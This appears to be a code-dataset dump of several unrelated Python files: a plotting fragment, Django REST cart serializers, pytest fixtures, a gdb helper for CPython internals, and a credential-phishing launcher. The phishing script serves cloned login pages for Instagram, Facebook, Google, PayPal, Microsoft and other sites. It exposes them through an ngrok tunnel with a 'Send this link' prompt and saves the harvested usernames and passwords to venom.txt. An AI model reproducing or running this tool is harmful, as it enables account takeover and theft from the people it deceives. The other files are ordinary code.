plt.xlim(-0.1, 10)
plt.ylim(-0.01, 1.01)
plt.xlabel(loss_type)
plt.ylabel('ACC-LOSS')
plt.legend(loc="center right")
plt.savefig("acc_loss.pdf")
plt.show()
|
py | 7df7c86cf18661897592d9456cc956c0e82cec83 | from rest_framework import serializers
from goods.models import SKU
class CartAddSerializer(serializers.Serializer):
sku_id = serializers.IntegerField()
count = serializers.IntegerField(min_value=1)
selected = serializers.BooleanField(required=False)
def validate_sku_id(self, value):
count = SKU.objects.filter(pk=value).count()
if count <= 0:
raise serializers.ValidationError('无效的商品编号')
return value
class CartSerializer(serializers.ModelSerializer):
count = serializers.IntegerField()
selected = serializers.BooleanField()
class Meta:
model = SKU
fields = ['id', 'name', 'price', 'default_image_url', 'count', 'selected']
class CartDeleteSerializer(serializers.Serializer):
sku_id = serializers.IntegerField()
def validate_sku_id(self, value):
count = SKU.objects.filter(pk=value).count()
if count <= 0:
raise serializers.ValidationError('无效的商品编号')
return value
class CartSelectSerializer(serializers.Serializer):
selected = serializers.BooleanField()
|
py | 7df7c8e068f80e9079c65dff6f77fa602daa647b | import pytest
from functools import partial
from diplomas.services import DiplomaGenerator
@pytest.fixture
def student(mixer):
return mixer.blend('users.User', first_name='Овир', last_name='Кривомазов', gender='male')
@pytest.fixture
def course(mixer):
return mixer.blend('products.Course')
@pytest.fixture
def order(factory, course, student):
return factory.order(user=student, item=course, is_paid=True)
@pytest.fixture
def template(mixer, course):
return mixer.blend('diplomas.DiplomaTemplate', slug='test-template', course=course, language='ru')
@pytest.fixture
def generator(course, student):
return partial(DiplomaGenerator, course=course, student=student)
|
py | 7df7c8f7b9515b18b4c998e2850abeb0f4a86bae | from setup.colors import ran , r, c, y,lg , g , w
p = ran
from setup.sprint import sprint
from setup.banner import banner , clear , banner2
import random
import time , os , sys
clear()
banner()
try:
import requests
import colorama
except ModuleNotFoundError:
os.system("pip install colorama")
os.system("pip install requests")
def command(str):
os.system(str)
def error(str):
print(f"{y}[{r}!{y}] {lg}{str}")
def internet():
try:
res = requests.get("https://google.com")
if res.status_code == 200:
error("Internet connection found.")
elif res.status_code == 400:
error("Internet connection not found")
exit()
except KeyboardInterrupt:
error(f"{r}[{c}!{r}] {p} Exiting -----> ")
exit()
except:
print(f"{r}[{c}!{r}] {y} Please on your internet connection")
internet()
def mkdir():
try:
os.makedirs("cache")
except FileExistsError:
pass
except Exception:
error("Failed...")
mkdir()
def userDATA(site):
while True:
if os.path.exists(f"cache/{site}/userlog.txt"):
error("User data found! ")
os.system(f"cat cache/{site}/userlog.txt")
os.system(f"cat cache/{site}/userlog.txt >> venom.txt")
error(f"{y}[{g}+{y}] {r} Username and password saved into venom.txt")
os.system(f"rm -rf cache/{site}/userlog.txt")
else:
pass
def localHost(site):
path = f"sites/{site}"
des = "cache/"
os.system(f"cp -R {path} {des}")
print("\n")
print(f"{r}[{w}~{r}] {g} Select any\n ")
print(f"{y}[{g}01{y}] {r} Localhost--Random--")
print(f"{y}[{g}02{y}] {r} Localhost--Custom--")
port_ = random.randint(1150, 9999)
l_optn = input(f"{y}[{g}~{y}] {w} Choose option: ")
if l_optn == "1" or l_optn == "01":
os.system(f"php -S 127.0.0.1:{port_} -t cache/{site} > /dev/null 2>&1 & sleep 2")
print(f"{r}[{w}+{r}] {g} Localhost started on http://127.0.0.1:{port_}")
userDATA(site)
elif l_optn == "2" or l_optn == "02":
print()
port_ = int(input(f"{r}[{g}+{r}] {y} Enter a portnumber: "))
os.system(f"php -S 127.0.0.1:{port_} -t cache/{site} > /dev/null 2>&1 & sleep 2")
print(f"{r}[{w}+{r}] {g} Localhost started on http://127.0.0.1:{port_}")
userDATA(site)
else:
error("Invalid option")
exit(0)
def ngrok(server):
try:
path = f"sites/{server}"
des = "pweb/"
os.system(f"cp -R {path} {des}")
print("\n")
port_ = random.randint(1150, 9999)
os.system(f"php -S 127.0.0.1:{port_} -t pweb/{server} > /dev/null 2>&1 & sleep 2")
os.system(f"./ngrok http http://127.0.0.1:{port_} > /dev/null 2>&1 & sleep 8")
os.system(f'echo -ne "Send this link: "')
os.system(f'curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io"')
userDATA(server)
except KeyboardInterrupt:
print()
error(f"{r} _______{g}Exiting{r}______")
time.sleep(2)
sys.exit(1)
def hostOption(site):
print("\n")
print(f"{p}[{g}~{p}] {w} Link generating option")
print()
print(f"{w}[{y}01{w}] {g} Localhost")
print(f"{w}[{y}02{w}] {g} Ngrok")
print()
h_optn = input(f"{r}[{w}×{r}] {y} Choose option: ")
if h_optn == "1" or h_optn == "01":
localHost(site)
elif h_optn == "2" or h_optn == "02":
ngrok(site)
def menu():
print(f"{y}[{g}01{y}] {c} Instagram {y}[{g}11{y}] {c} Dropbox ")
print(f"{y}[{g}02{y}] {c} Facebook {y}[{g}12{y}] {c} ig_follower ")
print(f"{y}[{g}03{y}] {c} Google {y}[{g}13{y}] {c} Yandex ")
print(f"{y}[{g}04{y}] {c} Twitter {y}[{g}14{y}] {c} Origin ")
print(f"{y}[{g}05{y}] {c} Netflix {y}[{g}15{y}] {c} Ebay ")
print(f"{y}[{g}06{y}] {c} Snapchat {y}[{g}16{y}] {c} Pinetrest ")
print(f"{y}[{g}07{y}] {c} Yahoo {y}[{g}17{y}] {c} Linkdin ")
print(f"{y}[{g}08{y}] {c} Github {y}[{g}18{y}] {c} Ebay ")
print(f"{y}[{g}09{y}] {c} Paypal {y}[{g}19{y}] {c} Microsoft ")
print(f"{y}[{g}10{y}] {c} Spotify {y}[{g}20{y}] {c} About me ")
menu()
print("\n")
try:
optn = input(f"{w}[{g}×{w}] {p} Choose an option: ")
except KeyboardInterrupt:
error("Keyboard interrupt")
time.sleep(1)
exit()
if optn == '1' or optn == '01':
hostOption("instagram")
elif optn == '2' or optn == '02':
hostOption("facebook")
elif optn == '3' or optn == '03':
hostOption("google")
elif optn == '4' or optn == '04':
hostOption("twitter")
elif optn == '5' or optn == '05':
hostOption("netflix")
elif optn == '6' or optn == '06':
hostOption("snapchat")
elif optn == '7' or optn == '07':
hostOption("yahoo")
elif optn == '8' or optn == '08':
hostOption("github")
elif optn == '9' or optn == '09':
hostOption("paypal")
elif optn == '10':
hostOption("spotify")
elif optn == '11':
hostOption("dropbox")
elif optn == '12':
hostOption("ig_follower")
elif optn == '13':
hostOption("yandex")
elif optn == '14':
hostOption("origin")
elif optn == '15':
hostOption("ebay")
elif optn == '16':
hostOption("pinetrest")
elif optn == '17':
hostOption("linkedin")
elif optn == '18':
hostOption("snapchat")
elif optn == '19':
hostOption("microsoft")
elif optn == '20':
print(f"{y} I am Saad :-) \n{r}{c} Instagram : https://instagram.com/saadkhan041\n{p} Github : https://github.com/Saadkhan041")
else:
print("\n")
error("Invalid option selected SUCCESSFULLY")
time.sleep(1)
exit()
banner2()
|
py | 7df7c9bd541672fab6ba2679ae0c01d066e79dea | #!/usr/bin/python
'''
From gdb 7 onwards, gdb's build can be configured --with-python, allowing gdb
to be extended with Python code e.g. for library-specific data visualizations,
such as for the C++ STL types. Documentation on this API can be seen at:
http://sourceware.org/gdb/current/onlinedocs/gdb/Python-API.html
This python module deals with the case when the process being debugged (the
"inferior process" in gdb parlance) is itself python, or more specifically,
linked against libpython. In this situation, almost every item of data is a
(PyObject*), and having the debugger merely print their addresses is not very
enlightening.
This module embeds knowledge about the implementation details of libpython so
that we can emit useful visualizations e.g. a string, a list, a dict, a frame
giving file/line information and the state of local variables
In particular, given a gdb.Value corresponding to a PyObject* in the inferior
process, we can generate a "proxy value" within the gdb process. For example,
given a PyObject* in the inferior process that is in fact a PyListObject*
holding three PyObject* that turn out to be PyBytesObject* instances, we can
generate a proxy value within the gdb process that is a list of bytes
instances:
[b"foo", b"bar", b"baz"]
Doing so can be expensive for complicated graphs of objects, and could take
some time, so we also have a "write_repr" method that writes a representation
of the data to a file-like object. This allows us to stop the traversal by
having the file-like object raise an exception if it gets too much data.
With both "proxyval" and "write_repr" we keep track of the set of all addresses
visited so far in the traversal, to avoid infinite recursion due to cycles in
the graph of object references.
We try to defer gdb.lookup_type() invocations for python types until as late as
possible: for a dynamically linked python binary, when the process starts in
the debugger, the libpython.so hasn't been dynamically loaded yet, so none of
the type names are known to the debugger
The module also extends gdb with some python-specific commands.
'''
# NOTE: some gdbs are linked with Python 3, so this file should be dual-syntax
# compatible (2.6+ and 3.0+). See #19308.
from __future__ import print_function
import gdb
import os
import locale
import sys
if sys.version_info[0] >= 3:
unichr = chr
xrange = range
long = int
# Look up the gdb.Type for some standard types:
# Those need to be refreshed as types (pointer sizes) may change when
# gdb loads different executables
def _type_char_ptr():
return gdb.lookup_type('char').pointer() # char*
def _type_unsigned_char_ptr():
return gdb.lookup_type('unsigned char').pointer() # unsigned char*
def _type_unsigned_short_ptr():
return gdb.lookup_type('unsigned short').pointer()
def _type_unsigned_int_ptr():
return gdb.lookup_type('unsigned int').pointer()
def _sizeof_void_p():
return gdb.lookup_type('void').pointer().sizeof
# value computed later, see PyUnicodeObjectPtr.proxy()
_is_pep393 = None
Py_TPFLAGS_HEAPTYPE = (1 << 9)
Py_TPFLAGS_LONG_SUBCLASS = (1 << 24)
Py_TPFLAGS_LIST_SUBCLASS = (1 << 25)
Py_TPFLAGS_TUPLE_SUBCLASS = (1 << 26)
Py_TPFLAGS_BYTES_SUBCLASS = (1 << 27)
Py_TPFLAGS_UNICODE_SUBCLASS = (1 << 28)
Py_TPFLAGS_DICT_SUBCLASS = (1 << 29)
Py_TPFLAGS_BASE_EXC_SUBCLASS = (1 << 30)
Py_TPFLAGS_TYPE_SUBCLASS = (1 << 31)
MAX_OUTPUT_LEN=1024
hexdigits = "0123456789abcdef"
ENCODING = locale.getpreferredencoding()
EVALFRAME = '_PyEval_EvalFrameDefault'
class NullPyObjectPtr(RuntimeError):
pass
def safety_limit(val):
# Given an integer value from the process being debugged, limit it to some
# safety threshold so that arbitrary breakage within said process doesn't
# break the gdb process too much (e.g. sizes of iterations, sizes of lists)
return min(val, 1000)
def safe_range(val):
# As per range, but don't trust the value too much: cap it to a safety
# threshold in case the data was corrupted
return xrange(safety_limit(int(val)))
if sys.version_info[0] >= 3:
def write_unicode(file, text):
file.write(text)
else:
def write_unicode(file, text):
# Write a byte or unicode string to file. Unicode strings are encoded to
# ENCODING encoding with 'backslashreplace' error handler to avoid
# UnicodeEncodeError.
if isinstance(text, unicode):
text = text.encode(ENCODING, 'backslashreplace')
file.write(text)
try:
os_fsencode = os.fsencode
except AttributeError:
def os_fsencode(filename):
if not isinstance(filename, unicode):
return filename
encoding = sys.getfilesystemencoding()
if encoding == 'mbcs':
# mbcs doesn't support surrogateescape
return filename.encode(encoding)
encoded = []
for char in filename:
# surrogateescape error handler
if 0xDC80 <= ord(char) <= 0xDCFF:
byte = chr(ord(char) - 0xDC00)
else:
byte = char.encode(encoding)
encoded.append(byte)
return ''.join(encoded)
class StringTruncated(RuntimeError):
pass
class TruncatedStringIO(object):
'''Similar to io.StringIO, but can truncate the output by raising a
StringTruncated exception'''
def __init__(self, maxlen=None):
self._val = ''
self.maxlen = maxlen
def write(self, data):
if self.maxlen:
if len(data) + len(self._val) > self.maxlen:
# Truncation:
self._val += data[0:self.maxlen - len(self._val)]
raise StringTruncated()
self._val += data
def getvalue(self):
return self._val
class PyObjectPtr(object):
"""
Class wrapping a gdb.Value that's either a (PyObject*) within the
inferior process, or some subclass pointer e.g. (PyBytesObject*)
There will be a subclass for every refined PyObject type that we care
about.
Note that at every stage the underlying pointer could be NULL, point
to corrupt data, etc; this is the debugger, after all.
"""
_typename = 'PyObject'
def __init__(self, gdbval, cast_to=None):
if cast_to:
self._gdbval = gdbval.cast(cast_to)
else:
self._gdbval = gdbval
def field(self, name):
'''
Get the gdb.Value for the given field within the PyObject, coping with
some python 2 versus python 3 differences.
Various libpython types are defined using the "PyObject_HEAD" and
"PyObject_VAR_HEAD" macros.
In Python 2, this these are defined so that "ob_type" and (for a var
object) "ob_size" are fields of the type in question.
In Python 3, this is defined as an embedded PyVarObject type thus:
PyVarObject ob_base;
so that the "ob_size" field is located insize the "ob_base" field, and
the "ob_type" is most easily accessed by casting back to a (PyObject*).
'''
if self.is_null():
raise NullPyObjectPtr(self)
if name == 'ob_type':
pyo_ptr = self._gdbval.cast(PyObjectPtr.get_gdb_type())
return pyo_ptr.dereference()[name]
if name == 'ob_size':
pyo_ptr = self._gdbval.cast(PyVarObjectPtr.get_gdb_type())
return pyo_ptr.dereference()[name]
# General case: look it up inside the object:
return self._gdbval.dereference()[name]
def pyop_field(self, name):
'''
Get a PyObjectPtr for the given PyObject* field within this PyObject,
coping with some python 2 versus python 3 differences.
'''
return PyObjectPtr.from_pyobject_ptr(self.field(name))
def write_field_repr(self, name, out, visited):
'''
Extract the PyObject* field named "name", and write its representation
to file-like object "out"
'''
field_obj = self.pyop_field(name)
field_obj.write_repr(out, visited)
def get_truncated_repr(self, maxlen):
'''
Get a repr-like string for the data, but truncate it at "maxlen" bytes
(ending the object graph traversal as soon as you do)
'''
out = TruncatedStringIO(maxlen)
try:
self.write_repr(out, set())
except StringTruncated:
# Truncation occurred:
return out.getvalue() + '...(truncated)'
# No truncation occurred:
return out.getvalue()
def type(self):
return PyTypeObjectPtr(self.field('ob_type'))
def is_null(self):
return 0 == long(self._gdbval)
def is_optimized_out(self):
'''
Is the value of the underlying PyObject* visible to the debugger?
This can vary with the precise version of the compiler used to build
Python, and the precise version of gdb.
See e.g. https://bugzilla.redhat.com/show_bug.cgi?id=556975 with
PyEval_EvalFrameEx's "f"
'''
return self._gdbval.is_optimized_out
def safe_tp_name(self):
try:
return self.type().field('tp_name').string()
except NullPyObjectPtr:
# NULL tp_name?
return 'unknown'
except RuntimeError:
# Can't even read the object at all?
return 'unknown'
def proxyval(self, visited):
'''
Scrape a value from the inferior process, and try to represent it
within the gdb process, whilst (hopefully) avoiding crashes when
the remote data is corrupt.
Derived classes will override this.
For example, a PyIntObject* with ob_ival 42 in the inferior process
should result in an int(42) in this process.
visited: a set of all gdb.Value pyobject pointers already visited
whilst generating this value (to guard against infinite recursion when
visiting object graphs with loops). Analogous to Py_ReprEnter and
Py_ReprLeave
'''
class FakeRepr(object):
"""
Class representing a non-descript PyObject* value in the inferior
process for when we don't have a custom scraper, intended to have
a sane repr().
"""
def __init__(self, tp_name, address):
self.tp_name = tp_name
self.address = address
def __repr__(self):
# For the NULL pointer, we have no way of knowing a type, so
# special-case it as per
# http://bugs.python.org/issue8032#msg100882
if self.address == 0:
return '0x0'
return '<%s at remote 0x%x>' % (self.tp_name, self.address)
return FakeRepr(self.safe_tp_name(),
long(self._gdbval))
def write_repr(self, out, visited):
'''
Write a string representation of the value scraped from the inferior
process to "out", a file-like object.
'''
# Default implementation: generate a proxy value and write its repr
# However, this could involve a lot of work for complicated objects,
# so for derived classes we specialize this
return out.write(repr(self.proxyval(visited)))
@classmethod
def subclass_from_type(cls, t):
'''
Given a PyTypeObjectPtr instance wrapping a gdb.Value that's a
(PyTypeObject*), determine the corresponding subclass of PyObjectPtr
to use
Ideally, we would look up the symbols for the global types, but that
isn't working yet:
(gdb) python print gdb.lookup_symbol('PyList_Type')[0].value
Traceback (most recent call last):
File "<string>", line 1, in <module>
NotImplementedError: Symbol type not yet supported in Python scripts.
Error while executing Python code.
For now, we use tp_flags, after doing some string comparisons on the
tp_name for some special-cases that don't seem to be visible through
flags
'''
try:
tp_name = t.field('tp_name').string()
tp_flags = int(t.field('tp_flags'))
except RuntimeError:
# Handle any kind of error e.g. NULL ptrs by simply using the base
# class
return cls
#print('tp_flags = 0x%08x' % tp_flags)
#print('tp_name = %r' % tp_name)
name_map = {'bool': PyBoolObjectPtr,
'classobj': PyClassObjectPtr,
'NoneType': PyNoneStructPtr,
'frame': PyFrameObjectPtr,
'set' : PySetObjectPtr,
'frozenset' : PySetObjectPtr,
'builtin_function_or_method' : PyCFunctionObjectPtr,
'method-wrapper': wrapperobject,
}
if tp_name in name_map:
return name_map[tp_name]
if tp_flags & Py_TPFLAGS_HEAPTYPE:
return HeapTypeObjectPtr
if tp_flags & Py_TPFLAGS_LONG_SUBCLASS:
return PyLongObjectPtr
if tp_flags & Py_TPFLAGS_LIST_SUBCLASS:
return PyListObjectPtr
if tp_flags & Py_TPFLAGS_TUPLE_SUBCLASS:
return PyTupleObjectPtr
if tp_flags & Py_TPFLAGS_BYTES_SUBCLASS:
return PyBytesObjectPtr
if tp_flags & Py_TPFLAGS_UNICODE_SUBCLASS:
return PyUnicodeObjectPtr
if tp_flags & Py_TPFLAGS_DICT_SUBCLASS:
return PyDictObjectPtr
if tp_flags & Py_TPFLAGS_BASE_EXC_SUBCLASS:
return PyBaseExceptionObjectPtr
#if tp_flags & Py_TPFLAGS_TYPE_SUBCLASS:
# return PyTypeObjectPtr
# Use the base class:
return cls
@classmethod
def from_pyobject_ptr(cls, gdbval):
'''
Try to locate the appropriate derived class dynamically, and cast
the pointer accordingly.
'''
try:
p = PyObjectPtr(gdbval)
cls = cls.subclass_from_type(p.type())
return cls(gdbval, cast_to=cls.get_gdb_type())
except RuntimeError:
# Handle any kind of error e.g. NULL ptrs by simply using the base
# class
pass
return cls(gdbval)
@classmethod
def get_gdb_type(cls):
return gdb.lookup_type(cls._typename).pointer()
def as_address(self):
return long(self._gdbval)
class PyVarObjectPtr(PyObjectPtr):
_typename = 'PyVarObject'
class ProxyAlreadyVisited(object):
'''
Placeholder proxy to use when protecting against infinite recursion due to
loops in the object graph.
Analogous to the values emitted by the users of Py_ReprEnter and Py_ReprLeave
'''
def __init__(self, rep):
self._rep = rep
def __repr__(self):
return self._rep
def _write_instance_repr(out, visited, name, pyop_attrdict, address):
'''Shared code for use by all classes:
write a representation to file-like object "out"'''
out.write('<')
out.write(name)
# Write dictionary of instance attributes:
if isinstance(pyop_attrdict, PyDictObjectPtr):
out.write('(')
first = True
for pyop_arg, pyop_val in pyop_attrdict.iteritems():
if not first:
out.write(', ')
first = False
out.write(pyop_arg.proxyval(visited))
out.write('=')
pyop_val.write_repr(out, visited)
out.write(')')
out.write(' at remote 0x%x>' % address)
class InstanceProxy(object):
def __init__(self, cl_name, attrdict, address):
self.cl_name = cl_name
self.attrdict = attrdict
self.address = address
def __repr__(self):
if isinstance(self.attrdict, dict):
kwargs = ', '.join(["%s=%r" % (arg, val)
for arg, val in self.attrdict.iteritems()])
return '<%s(%s) at remote 0x%x>' % (self.cl_name,
kwargs, self.address)
else:
return '<%s at remote 0x%x>' % (self.cl_name,
self.address)
def _PyObject_VAR_SIZE(typeobj, nitems):
if _PyObject_VAR_SIZE._type_size_t is None:
_PyObject_VAR_SIZE._type_size_t = gdb.lookup_type('size_t')
return ( ( typeobj.field('tp_basicsize') +
nitems * typeobj.field('tp_itemsize') +
(_sizeof_void_p() - 1)
) & ~(_sizeof_void_p() - 1)
).cast(_PyObject_VAR_SIZE._type_size_t)
_PyObject_VAR_SIZE._type_size_t = None
class HeapTypeObjectPtr(PyObjectPtr):
_typename = 'PyObject'
def get_attr_dict(self):
'''
Get the PyDictObject ptr representing the attribute dictionary
(or None if there's a problem)
'''
try:
typeobj = self.type()
dictoffset = int_from_int(typeobj.field('tp_dictoffset'))
if dictoffset != 0:
if dictoffset < 0:
type_PyVarObject_ptr = gdb.lookup_type('PyVarObject').pointer()
tsize = int_from_int(self._gdbval.cast(type_PyVarObject_ptr)['ob_size'])
if tsize < 0:
tsize = -tsize
size = _PyObject_VAR_SIZE(typeobj, tsize)
dictoffset += size
assert dictoffset > 0
assert dictoffset % _sizeof_void_p() == 0
dictptr = self._gdbval.cast(_type_char_ptr()) + dictoffset
PyObjectPtrPtr = PyObjectPtr.get_gdb_type().pointer()
dictptr = dictptr.cast(PyObjectPtrPtr)
return PyObjectPtr.from_pyobject_ptr(dictptr.dereference())
except RuntimeError:
# Corrupt data somewhere; fail safe
pass
# Not found, or some kind of error:
return None
def proxyval(self, visited):
'''
Support for classes.
Currently we just locate the dictionary using a transliteration to
python of _PyObject_GetDictPtr, ignoring descriptors
'''
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('<...>')
visited.add(self.as_address())
pyop_attr_dict = self.get_attr_dict()
if pyop_attr_dict:
attr_dict = pyop_attr_dict.proxyval(visited)
else:
attr_dict = {}
tp_name = self.safe_tp_name()
# Class:
return InstanceProxy(tp_name, attr_dict, long(self._gdbval))
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('<...>')
return
visited.add(self.as_address())
pyop_attrdict = self.get_attr_dict()
_write_instance_repr(out, visited,
self.safe_tp_name(), pyop_attrdict, self.as_address())
class ProxyException(Exception):
def __init__(self, tp_name, args):
self.tp_name = tp_name
self.args = args
def __repr__(self):
return '%s%r' % (self.tp_name, self.args)
class PyBaseExceptionObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyBaseExceptionObject* i.e. an exception
within the process being debugged.
"""
_typename = 'PyBaseExceptionObject'
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('(...)')
visited.add(self.as_address())
arg_proxy = self.pyop_field('args').proxyval(visited)
return ProxyException(self.safe_tp_name(),
arg_proxy)
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('(...)')
return
visited.add(self.as_address())
out.write(self.safe_tp_name())
self.write_field_repr('args', out, visited)
class PyClassObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyClassObject* i.e. a <classobj>
instance within the process being debugged.
"""
_typename = 'PyClassObject'
class BuiltInFunctionProxy(object):
def __init__(self, ml_name):
self.ml_name = ml_name
def __repr__(self):
return "<built-in function %s>" % self.ml_name
class BuiltInMethodProxy(object):
def __init__(self, ml_name, pyop_m_self):
self.ml_name = ml_name
self.pyop_m_self = pyop_m_self
def __repr__(self):
return ('<built-in method %s of %s object at remote 0x%x>'
% (self.ml_name,
self.pyop_m_self.safe_tp_name(),
self.pyop_m_self.as_address())
)
class PyCFunctionObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyCFunctionObject*
(see Include/methodobject.h and Objects/methodobject.c)
"""
_typename = 'PyCFunctionObject'
def proxyval(self, visited):
m_ml = self.field('m_ml') # m_ml is a (PyMethodDef*)
ml_name = m_ml['ml_name'].string()
pyop_m_self = self.pyop_field('m_self')
if pyop_m_self.is_null():
return BuiltInFunctionProxy(ml_name)
else:
return BuiltInMethodProxy(ml_name, pyop_m_self)
class PyCodeObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyCodeObject* i.e. a <code> instance
within the process being debugged.
"""
_typename = 'PyCodeObject'
def addr2line(self, addrq):
'''
Get the line number for a given bytecode offset
Analogous to PyCode_Addr2Line; translated from pseudocode in
Objects/lnotab_notes.txt
'''
co_lnotab = self.pyop_field('co_lnotab').proxyval(set())
# Initialize lineno to co_firstlineno as per PyCode_Addr2Line
# not 0, as lnotab_notes.txt has it:
lineno = int_from_int(self.field('co_firstlineno'))
addr = 0
for addr_incr, line_incr in zip(co_lnotab[::2], co_lnotab[1::2]):
addr += ord(addr_incr)
if addr > addrq:
return lineno
lineno += ord(line_incr)
return lineno
class PyDictObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyDictObject* i.e. a dict instance
within the process being debugged.
"""
_typename = 'PyDictObject'
def iteritems(self):
'''
Yields a sequence of (PyObjectPtr key, PyObjectPtr value) pairs,
analogous to dict.iteritems()
'''
keys = self.field('ma_keys')
values = self.field('ma_values')
entries, nentries = self._get_entries(keys)
for i in safe_range(nentries):
ep = entries[i]
if long(values):
pyop_value = PyObjectPtr.from_pyobject_ptr(values[i])
else:
pyop_value = PyObjectPtr.from_pyobject_ptr(ep['me_value'])
if not pyop_value.is_null():
pyop_key = PyObjectPtr.from_pyobject_ptr(ep['me_key'])
yield (pyop_key, pyop_value)
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('{...}')
visited.add(self.as_address())
result = {}
for pyop_key, pyop_value in self.iteritems():
proxy_key = pyop_key.proxyval(visited)
proxy_value = pyop_value.proxyval(visited)
result[proxy_key] = proxy_value
return result
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('{...}')
return
visited.add(self.as_address())
out.write('{')
first = True
for pyop_key, pyop_value in self.iteritems():
if not first:
out.write(', ')
first = False
pyop_key.write_repr(out, visited)
out.write(': ')
pyop_value.write_repr(out, visited)
out.write('}')
def _get_entries(self, keys):
dk_nentries = int(keys['dk_nentries'])
dk_size = int(keys['dk_size'])
try:
# <= Python 3.5
return keys['dk_entries'], dk_size
except RuntimeError:
# >= Python 3.6
pass
if dk_size <= 0xFF:
offset = dk_size
elif dk_size <= 0xFFFF:
offset = 2 * dk_size
elif dk_size <= 0xFFFFFFFF:
offset = 4 * dk_size
else:
offset = 8 * dk_size
ent_addr = keys['dk_indices'].address
ent_addr = ent_addr.cast(_type_unsigned_char_ptr()) + offset
ent_ptr_t = gdb.lookup_type('PyDictKeyEntry').pointer()
ent_addr = ent_addr.cast(ent_ptr_t)
return ent_addr, dk_nentries
class PyListObjectPtr(PyObjectPtr):
_typename = 'PyListObject'
def __getitem__(self, i):
# Get the gdb.Value for the (PyObject*) with the given index:
field_ob_item = self.field('ob_item')
return field_ob_item[i]
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('[...]')
visited.add(self.as_address())
result = [PyObjectPtr.from_pyobject_ptr(self[i]).proxyval(visited)
for i in safe_range(int_from_int(self.field('ob_size')))]
return result
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('[...]')
return
visited.add(self.as_address())
out.write('[')
for i in safe_range(int_from_int(self.field('ob_size'))):
if i > 0:
out.write(', ')
element = PyObjectPtr.from_pyobject_ptr(self[i])
element.write_repr(out, visited)
out.write(']')
class PyLongObjectPtr(PyObjectPtr):
_typename = 'PyLongObject'
def proxyval(self, visited):
'''
Python's Include/longobjrep.h has this declaration:
struct _longobject {
PyObject_VAR_HEAD
digit ob_digit[1];
};
with this description:
The absolute value of a number is equal to
SUM(for i=0 through abs(ob_size)-1) ob_digit[i] * 2**(SHIFT*i)
Negative numbers are represented with ob_size < 0;
zero is represented by ob_size == 0.
where SHIFT can be either:
#define PyLong_SHIFT 30
#define PyLong_SHIFT 15
'''
ob_size = long(self.field('ob_size'))
if ob_size == 0:
return 0
ob_digit = self.field('ob_digit')
if gdb.lookup_type('digit').sizeof == 2:
SHIFT = 15
else:
SHIFT = 30
digits = [long(ob_digit[i]) * 2**(SHIFT*i)
for i in safe_range(abs(ob_size))]
result = sum(digits)
if ob_size < 0:
result = -result
return result
def write_repr(self, out, visited):
# Write this out as a Python 3 int literal, i.e. without the "L" suffix
proxy = self.proxyval(visited)
out.write("%s" % proxy)
class PyBoolObjectPtr(PyLongObjectPtr):
"""
Class wrapping a gdb.Value that's a PyBoolObject* i.e. one of the two
<bool> instances (Py_True/Py_False) within the process being debugged.
"""
def proxyval(self, visited):
if PyLongObjectPtr.proxyval(self, visited):
return True
else:
return False
class PyNoneStructPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyObject* pointing to the
singleton (we hope) _Py_NoneStruct with ob_type PyNone_Type
"""
_typename = 'PyObject'
def proxyval(self, visited):
return None
class PyFrameObjectPtr(PyObjectPtr):
_typename = 'PyFrameObject'
def __init__(self, gdbval, cast_to=None):
PyObjectPtr.__init__(self, gdbval, cast_to)
if not self.is_optimized_out():
self.co = PyCodeObjectPtr.from_pyobject_ptr(self.field('f_code'))
self.co_name = self.co.pyop_field('co_name')
self.co_filename = self.co.pyop_field('co_filename')
self.f_lineno = int_from_int(self.field('f_lineno'))
self.f_lasti = int_from_int(self.field('f_lasti'))
self.co_nlocals = int_from_int(self.co.field('co_nlocals'))
self.co_varnames = PyTupleObjectPtr.from_pyobject_ptr(self.co.field('co_varnames'))
def iter_locals(self):
'''
Yield a sequence of (name,value) pairs of PyObjectPtr instances, for
the local variables of this frame
'''
if self.is_optimized_out():
return
f_localsplus = self.field('f_localsplus')
for i in safe_range(self.co_nlocals):
pyop_value = PyObjectPtr.from_pyobject_ptr(f_localsplus[i])
if not pyop_value.is_null():
pyop_name = PyObjectPtr.from_pyobject_ptr(self.co_varnames[i])
yield (pyop_name, pyop_value)
def iter_globals(self):
'''
Yield a sequence of (name,value) pairs of PyObjectPtr instances, for
the global variables of this frame
'''
if self.is_optimized_out():
return ()
pyop_globals = self.pyop_field('f_globals')
return pyop_globals.iteritems()
def iter_builtins(self):
'''
Yield a sequence of (name,value) pairs of PyObjectPtr instances, for
the builtin variables
'''
if self.is_optimized_out():
return ()
pyop_builtins = self.pyop_field('f_builtins')
return pyop_builtins.iteritems()
def get_var_by_name(self, name):
'''
Look for the named local variable, returning a (PyObjectPtr, scope) pair
where scope is a string 'local', 'global', 'builtin'
If not found, return (None, None)
'''
for pyop_name, pyop_value in self.iter_locals():
if name == pyop_name.proxyval(set()):
return pyop_value, 'local'
for pyop_name, pyop_value in self.iter_globals():
if name == pyop_name.proxyval(set()):
return pyop_value, 'global'
for pyop_name, pyop_value in self.iter_builtins():
if name == pyop_name.proxyval(set()):
return pyop_value, 'builtin'
return None, None
def filename(self):
'''Get the path of the current Python source file, as a string'''
if self.is_optimized_out():
return '(frame information optimized out)'
return self.co_filename.proxyval(set())
def current_line_num(self):
'''Get current line number as an integer (1-based)
Translated from PyFrame_GetLineNumber and PyCode_Addr2Line
See Objects/lnotab_notes.txt
'''
if self.is_optimized_out():
return None
f_trace = self.field('f_trace')
if long(f_trace) != 0:
# we have a non-NULL f_trace:
